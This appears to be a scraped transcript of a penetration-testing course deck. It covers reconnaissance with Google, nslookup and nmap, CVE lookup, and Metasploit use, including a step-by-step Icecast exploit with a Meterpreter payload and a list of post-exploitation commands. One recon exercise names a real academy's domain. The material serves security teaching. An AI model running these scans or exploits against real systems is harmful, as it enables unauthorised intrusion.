Presentation is loading. Please wait.

Presentation is loading. Please wait.

Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.

Similar presentations


Presentation on theme: "Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine."— Presentation transcript:

1 Part 2 Penetration Testing

2 Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine Academy” to find URL site:usmma.edu site:usmma,edu –www.usmma.edu nslookup blackboard.usmma.edu nslookup...

3 Review 1-minute exercise: Use nmap to find all of the IP addresses in your group’s network ( /24) nmap –sn *

4 Review 1-minute exercise: Use nmap to find all of the open ports on Looking at the open ports, what type of server is this? nmap DNS

5 Review 2-minute exercise: Use nmap to find the version of the DNS server running on , port 53. ssh into and run this command to verify: /usr/sbin/named -ver sudo nmap –sV ISC BIND P1

6 Phase 3 - Penetration The goal of this step is to obtain a shell or run code on a remote machine. 90% research 10% attack Method: 1. Pick a host to exploit 2. Pick a running service on that host to exploit 3. Find out the version of the service 4. Find an exploit that works against that version 5. Run the exploit 6. Repeat as required

7 Metasploit Pentester tool/hacker tool Provides information about known security vulnerabilities Three types of tools: exploits: code to overflow buffers/break into servers payloads: code to provide access to OS, often a shell auxiliary: misc functions, usually to retrieve information, such as version numbers

8 CVE Common Vulnerabilities and Exposures (CVE) Reference system for known vulnerabilities Managed by MITRE Corporation Funded by DHS’s National Cyber Security Division Info is mirrored on multiple other sites, e.g.:

9 CVE When in doubt, ask Google:... Google: cve isc bind P1 CVE CVE CVE CVE Three types of tools: exploits: code to overflow buffers/break into servers payloads: code to provide access to OS, often a shell auxiliary: misc functions, usually to retrieve information, such as version numbers

10 Metasploit – find version of server $ msfconsole > search ssh > use auxiliary/scanner/ssh/ssh_version > show options > set RHOSTS > exploit Similiar to: nmap –sV –p22

11 Exploit walkthrough Target machine is nmap –O nmap –sV Google: cve icecast $ msfconsole > search icecast > use exploit/windows/http/icecast_header > show options > set RHOST > set PAYLOAD windows/meterpreter/bind_tcp > exploit

12 Meterpreter basics Meterpreter is a special shell injected as our payload Useful commands: getwd # show the current working directory sysinfo # print system info (name, OS, etc.) ipconfig # network info ps # list all process upload dest> download shell # Obtain a Windows shell (Win hosts only)


Download ppt "Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine."

Similar presentations


Ads by Google